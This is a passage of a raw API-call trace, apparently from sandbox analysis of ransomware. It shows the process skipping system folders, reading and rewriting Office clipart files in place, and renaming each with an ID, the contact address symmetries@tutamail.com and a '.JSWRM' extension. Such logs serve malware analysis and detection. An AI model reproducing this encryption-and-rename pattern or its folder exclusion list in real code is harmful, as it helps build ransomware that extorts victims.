dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1588) returned 1 [0093.559] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x2332c0 [0093.559] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x630, lpOverlapped=0x0) returned 1 [0093.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.560] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x630, lpOverlapped=0x0) returned 1 [0093.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0093.560] CloseHandle (hObject=0x314) returned 1 [0093.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0093.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0093.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0093.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0093.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0093.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0093.561] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0093.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7fce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE05930_.WMF", cAlternateFileName="")) returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2=".") returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="..") returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="...") returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="windows") returned -1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="recovery") returned -1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="perflogs") returned -1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="documents and settings") returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="system volume information") returned -1 [0093.562] lstrcmpiW (lpString1="PE05930_.WMF", lpString2="msocache") returned 1 [0093.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05930_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05930_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05930_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05930_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05930_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05930_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0093.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32718) returned 1 [0093.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7fc0) returned 0x24d210 [0093.563] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7fc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7fc0, lpOverlapped=0x0) returned 1 [0093.592] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.592] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7fc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7fc0, lpOverlapped=0x0) returned 1 [0093.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.593] CloseHandle (hObject=0x314) returned 1 [0093.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0093.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0093.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0093.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0093.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.595] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE06049_.WMF", cAlternateFileName="")) returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2=".") returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="..") returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="...") returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="windows") returned -1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="recovery") returned -1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="perflogs") returned -1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="documents and settings") returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="system volume information") returned -1 [0093.595] lstrcmpiW (lpString1="PE06049_.WMF", lpString2="msocache") returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06049_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06049_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE06049_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06049_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06049_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE06049_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0093.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0093.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.597] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4636) returned 1 [0093.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x205850 [0093.597] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0093.599] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.599] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0093.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.599] CloseHandle (hObject=0x314) returned 1 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0093.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0093.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0093.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.600] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4048, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE06450_.WMF", cAlternateFileName="")) returned 1 [0093.600] lstrcmpiW (lpString1="PE06450_.WMF", lpString2=".") returned 1 [0093.600] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="..") returned 1 [0093.600] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="...") returned 1 [0093.600] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="windows") returned -1 [0093.600] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="recovery") returned -1 [0093.601] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="perflogs") returned -1 [0093.601] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="documents and settings") returned 1 [0093.601] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.601] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="system volume information") returned -1 [0093.601] lstrcmpiW (lpString1="PE06450_.WMF", lpString2="msocache") returned 1 [0093.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06450_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06450_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE06450_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0093.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06450_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE06450_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE06450_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0093.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16456) returned 1 [0093.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4040) returned 0x24d210 [0093.602] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4040, lpOverlapped=0x0) returned 1 [0093.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.605] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4040, lpOverlapped=0x0) returned 1 [0093.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.605] CloseHandle (hObject=0x314) returned 1 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: 